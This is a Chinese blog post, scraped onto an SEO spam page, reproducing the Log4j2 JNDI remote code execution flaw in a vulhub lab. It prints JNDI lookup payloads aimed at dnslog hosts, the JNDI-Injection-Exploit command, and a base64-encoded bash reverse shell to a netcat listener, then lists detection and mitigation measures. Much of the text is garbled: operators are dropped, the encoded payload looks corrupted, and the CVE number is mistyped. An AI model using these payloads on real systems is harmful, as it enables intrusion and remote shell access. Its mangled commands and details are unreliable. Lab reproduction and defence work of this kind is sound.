当前位置: 首页 > news >正文

做网站流程图用wang域名做购物网站怎么样

做网站流程图,用wang域名做购物网站怎么样,精品一卡二卡 卡四卡分类,郑州网站建设推销在进行漏洞复现之前我们需要在linux虚拟机上进行docker的安装 我不喜欢win上安因为不知道为什么总是和我的vmware冲突 然后我的kali内核版本太低 我需要重新安装一个新的linux 并且配置网络 我相信这会话费我不少时间 查看版本 uname -a 需要5.5或以上的版本 看错了浪…在进行漏洞复现之前我们需要在linux虚拟机上进行docker的安装   我不喜欢win上安因为不知道为什么总是和我的vmware冲突  然后我的kali内核版本太低 我需要重新安装一个新的linux 并且配置网络 我相信这会话费我不少时间 查看版本 uname -a   需要5.5或以上的版本 看错了浪费我很多时间 5.1 以上就行 服了 docker安装教程【Docker】Linux安装Docker极简版 - 知乎 (zhihu.com) 这个安装方法其实不如这个kali下对Docker的详细安装_kali安装docker-CSDN博客 Usage: docker [OPTIONS] COMMAND [arg...]        docker daemon [ --help | ... ]        docker [ --help | -v | --version ] A self-sufficient runtime for containers.   Options:   --config~/.docker              Location of client config files  #客户端配置文件的位置   -D, --debugfalse               Enable debug mode  #启用Debug调试模式   -H, --host[]                   Daemon socket(s) to connect to  #守护进程的套接字Socket连接   -h, --helpfalse                Print usage  #打印使用   -l, --log-levelinfo            Set the logging level  #设置日志级别   --tlsfalse                     Use TLS; implied by--tlsverify  #   --tlscacert~/.docker/ca.pem    Trust certs signed only by this CA  #信任证书签名CA   --tlscert~/.docker/cert.pem    Path to TLS certificate file  #TLS证书文件路径   --tlskey~/.docker/key.pem      Path to TLS key file  #TLS密钥文件路径   --tlsverifyfalse               Use TLS and verify the remote  #使用TLS验证远程   -v, --versionfalse             Print version information and quit  #打印版本信息并退出   Commands:     attach    Attach to a running container  #当前shell下attach连接指定运行镜像     build     Build an image from a Dockerfile  #通过Dockerfile定制镜像     commit    Create a new image from a containers changes  #提交当前容器为新的镜像     cp          Copy files/folders from a container to a HOSTDIR or to STDOUT  #从容器中拷贝指定文件或者目录到宿主机中     create    Create a new container  #创建一个新的容器同run 但不启动容器     diff      Inspect changes on a containers filesystem  #查看docker容器变化     events    Get real time events from the server#从docker服务获取容器实时事件     exec      Run a command in a running container#在已存在的容器上运行命令     export    Export a containers filesystem as a tar archive  #导出容器的内容流作为一个tar归档文件(对应import)     history   Show the history of an image  #展示一个镜像形成历史     images    List images  #列出系统当前镜像     import    Import the contents from a tarball to create a filesystem image  #从tar包中的内容创建一个新的文件系统映像(对应export)     info      Display system-wide information  #显示系统相关信息     inspect   Return low-level information on a container or image  #查看容器详细信息     kill      Kill a running container  #kill指定docker容器     load      Load an image from a tar archive or STDIN  #从一个tar包中加载一个镜像(对应save)     login     Register or log in to a Docker registry#注册或者登陆一个docker源服务器     logout    Log out from a Docker registry  #从当前Docker registry退出     logs         Fetch the logs of a container  #输出当前容器日志信息     pause     Pause all processes within a container#暂停容器     port      List port mappings or a specific mapping for the CONTAINER  #查看映射端口对应的容器内部源端口     ps          List containers  #列出容器列表     pull      Pull an image or a repository from a registry  #从docker镜像源服务器拉取指定镜像或者库镜像     push      Push an image or a repository to a registry  #推送指定镜像或者库镜像至docker源服务器     rename    Rename a container  #重命名容器     restart   Restart a running container  #重启运行的容器     rm          Remove one or more containers  #移除一个或者多个容器     rmi          Remove one or more images  #移除一个或多个镜像(无容器使用该镜像才可以删除否则需要删除相关容器才可以继续或者-f强制删除)     run         Run a command in a new container  #创建一个新的容器并运行一个命令     save      Save an image(s) to a tar archive#保存一个镜像为一个tar包(对应load)     search    Search the Docker Hub for images  #在docker hub中搜索镜像     start     Start one or more stopped containers#启动容器     stats     Display a live stream of container(s) resource usage statistics  #统计容器使用资源     stop      Stop a running container  #停止容器     tag       Tag an image into a repository  #给源中镜像打标签     top       Display the running processes of a container #查看容器中运行的进程信息     unpause   Unpause all processes within a container  #取消暂停容器     version   Show the Docker version information#查看容器版本号     wait      Block until a container stops, then print its exit code  #截取容器停止时的退出状态值 Apache Log4j2 RCE原理验证和复现附CVE-2021-4101应急处置、 编号CVE-2021-44228 影响版本影响Log4j 1.2版本 然后我们先开始我们的漏洞检测 检测一个网站有没有这个漏洞 安装好docker照下图输入代码 然后查看你的虚拟机地址 访问192.168.245.132:38080 我的是这个 然后访问后如下图 然后我们打开bp 开启拦截点击 然后我们需要构造一个payload 需要利用一个网站 来检测DNS分析没有 也就是这个我们创建一个网站 然后把网站放进去 我来拿举个例子 http://192.168.245.132:38080/hello?payload$[jndi:ldap://r2ujl1.dnslog.cn} http://192.168.245.132:38080/hello?payload$[jndi :ldap://vh6vhl.dnslog.cn/exp}http://192.168.245.132:38080/hellopayload${jndi:ldap://${sys:java.version}.tpv6me.dnslog.cn } 失败了404 换成urlcode编码就行 然后刚刚这个网址DNSLog Platform有回显就代表有这个漏洞 我这边一直不回显 网上找了3个payload格式都不行 应该是这个网站出什么问题了 但是你们可能觉得没有什么用 别急 接下来我们开始提权 关于提权原理  我觉得这个讲的是最好的  最通俗易懂的  log4j2远程代码执行漏洞原理与漏洞复现基于vulhub保姆级的详细教程_log4j漏洞复现-CSDN博客 漏洞利用 下载软件 这里选用JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 下载JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar下载地址为https://github.com/bkfish/Apache-Log4j-Learning/tree/main 应用工具JNDI-Injection-Exploit搭建服务格式 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “命令” -A “ip攻击机” 这里的命令是想要靶机运行的命令-A后放的是发出攻击的电脑的ip也是存放-C后“命令”的ip地址。 接下来要实现反弹shell可以用命令 bash -i /dev/tcp/ip/port 01 用脚本开始建造的过程 1. 设置监听端口 nc -lnvp 4444 2. bash -i /dev/tcp/192.168.245.132/4444 01 将这个命令 利用base64位编码  bash -i /dev/tcp/192.168.245.132/4444 01 YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4xMzIvNDQ0NKAwPiYx java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4xMzIvNDQ0NKAwPiYx}|{base64,-d}|{bash,-i} -A 192.168.245.132 将上面代码输入在那个工具包里面执行命令行 提醒下小白 同时我们再用bp抓一个我们点击???的包包 并且改一下将 脚本生成的网址 再次生成一个payload并进行转码 用下面这个图来构造payload ${jndi:rmi://172.17.0.1:1099/tpbnp2} 监听界面出现下图就是成功 防范方法 复现时遇到的问题 1.环境安装时总遇到问题 2.打开DNSlog.cn网站时遇到很多问题 3.使用burp抓包与发包时遇到问题 排查 1.可以通过检查日志中是否存在jndi:ldap://、jndi:rmi等字符来发现可能的攻击行为 2.pom版本检查 3.各种安全产品 防御方法 1.设置jvm参数 -Dlog4j2.formatMsgNoLookupstrue。由于Java RMI的实现依赖于JVM所以可以通过调用JVM来修改。 2.设置log4j2.formatMsgNoLookupsTrue。 3.采用waf对请求流量中的${jndi进行拦截。通过对拦截JNDI语句来防止JNDI注入。 4.禁止不必要的业务访问外网配置网络防火墙,禁止系统主动外连网络包含不限于DNS、TCP/IP、ICMP。 这个博客方法多  log4j2远程代码执行漏洞原理与漏洞复现基于vulhub保姆级的详细教程_log4j漏洞复现-CSDN博客
http://www.zqtcl.cn/news/647983/

相关文章:

  • 网站开发 一般用什么语言vi视觉设计案例
  • 微信公众平台官方网官网seo优化找哪家做
  • 简约 网站模板网站目录链接怎么做
  • 国内地铁建设公司网站大连做网站外包
  • 微网站营销是什么网站图片上传代码
  • 外包公司做网站多少用vs做的网站怎么打开
  • 兴义城乡建设部网站企业服务器配置方案
  • 淘宝客网站根目录wordpress调用导航代码
  • 海外免费网站推广网站开发项目报告书
  • 大气的金融网站深圳专门做兼职的网站
  • 最新网站备案四平网站公司
  • 济宁恒德建设有限公司网站互联网营销师报名入口
  • 做灯饰的企业都会在哪些网站网站排名恢复
  • 互联网公司网站建设价格跨境支付互联互通
  • 杭州 高端网站 开发宜昌建设网站公司
  • 咋样做网站快照济南建设质量协会网站
  • 学校网站怎么建设兄弟网络(西安网站建设制作公司)
  • 长春市城乡建设局网站photoshop破解版下载免费中文版
  • 吕梁网站设计天津高端网页制作
  • 建一个网站做cpa联盟做淘客的网站都有哪几个
  • 中国建设银行网站对公业务wordpress 文章归档页面
  • 东软 网站群平台建设用个人电脑做网站服务器
  • 音乐播放网站开发pc端营销网站的关键字
  • 江门网站推广宿州官方网站建设
  • 企业网站建设策划书范文江苏高端网站建设
  • 网站开发 浏览器济宁网站建设服务
  • 整套网站建设网站开发中如何实现gps定位
  • 网站建设计划表福州自助建站
  • 网站做的比较好的公司吗2017年做网站多少钱
  • 基础展示营销型型网站重庆百度总代理